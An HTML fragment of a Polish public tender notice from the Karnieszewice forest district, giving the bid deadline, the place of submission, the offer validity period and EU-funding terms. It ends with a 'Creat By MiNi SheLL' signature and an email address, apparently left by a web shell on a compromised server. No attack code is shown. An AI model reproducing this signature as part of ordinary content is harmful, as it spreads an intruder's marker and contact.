<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.06.2016 godzina 10:30, miejsce: Skarb Państwa Lasy Państwowe
Nadleśnictwo Karnieszewice
Trawica 8a
76-004 Sianów
(sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com